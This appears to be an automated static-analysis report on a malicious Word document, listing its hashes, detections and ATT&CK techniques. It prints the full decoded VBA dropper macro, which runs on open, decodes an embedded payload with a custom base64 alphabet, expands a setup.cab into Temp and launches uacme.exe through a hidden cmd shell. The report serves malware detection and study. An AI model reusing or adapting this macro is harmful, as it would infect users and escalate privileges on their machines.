Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2046bb14d9f63612…

MALICIOUS

Office (OLE)

Size: 315.5 KB
Created: 2017-12-24 07:23:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 665249eb8e0375c8553c2887504e9312
SHA-1: 9e2c0bd19a77d712055ccc0276fdc062e9351436
SHA-256: 2046bb14d9f63612a6d19d5224727f3607be4e8f8ad13e9efe34620fda2d9d99
Risk Score: 230

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.003 Windows Command Shell
  • T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro, which is a common technique for initial execution. The macros utilize Shell() calls and reference cmd.exe, indicating an attempt to execute external commands. The ClamAV detection name 'Doc.Dropper.Agent-6424154-0' strongly suggests the file's purpose is to drop and execute a secondary payload.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6424154-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6424154-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  3235 bytes
SHA-256: 73022e710569e8f8ea1c134f1f55cf0ab0f13ecdc702545e52b03e86c94dfc2b

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Control = "TextBox2, 1, 1, MSForms, TextBox"
Private Function debase64(lpInBuffer As String, nOffset As Long, nCount As Long, OutputFile As String) As Long
    Dim strKey As String
    Dim lpOutBuffer() As Byte
    Dim chr1, chr2, chr3, enc1, enc2, enc3, enc4 As Byte
    Dim nIndex, nResult As Long
    
    strKey = "SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8"
  
    ReDim lpOutBuffer(nCount) As Byte
    
    nIndex = 1
    nResult = 0
    
    Do While nIndex <= nCount
        enc1 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc2 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc3 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc4 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        chr1 = (enc1 * 4) Or (enc2 \ 16)
        chr2 = ((enc2 And 15) * 16) Or (enc3 \ 4)
        chr3 = ((enc3 And 3) * 64) Or enc4
        
        lpOutBuffer(nResult) = chr1
        nResult = nResult + 1
        
        If enc3 <> 64 Then
            lpOutBuffer(nResult) = chr2
            nResult = nResult + 1
        End If
        
        If enc4 <> 64 Then
            lpOutBuffer(nResult) = chr3
            nResult = nResult + 1
        End If
    Loop
    
    ReDim Preserve lpOutBuffer(nResult - 1) As Byte
    
    Open OutputFile For Binary As #2
    Put #2, , lpOutBuffer
    Close #2
    
    debase64 = nResult
End Function

Private Function IsWin64() As Boolean
    Dim sTempPath As String
    
    sTempPath = Environ("SystemRoot")
    
    sTempPath = sTempPath + "\SysWOW64"
    
    sTempPath = Dir(sTempPath, vbDirectory)
  
    If sTempPath = "" Then
        IsWin64 = False
    Else
        IsWin64 = True
    End If
End Function

Private Sub Document_Open()
    Dim nResult As Long
    Dim bResult As Boolean
    Dim sTempPath As String
    Dim sTempFile As String

    With ActiveDocument.Content
        .Font.ColorIndex = wdBlack
        '.Paragraphs(4).Range.Font.ColorIndex = wdRed
    End With
    
    If TextBox1.Value <> 1 Then
        sTempPath = Environ("LOCALAPPDATA")
        sTempFile = sTempPath & "\Temp\setup.cab"
        
        bResult = IsWin64()
        
        If bResult = False Then
            nResult = debase64(TextBox1.Text, 0, TextBox1.TextLength, sTempFile)
        Else
            nResult = debase64(TextBox2.Text, 0, TextBox2.TextLength, sTempFile)
        End If
            
        nResult = Shell("cmd /c expand %TEMP%\setup.cab -F:* %TEMP% && cd /d %TEMP% && del /f /q setup.cab && uacme.exe", 0)
    End If
    
    TextBox1.Value = 1
    TextBox2.Value = 1
    ActiveDocument.Save
End Sub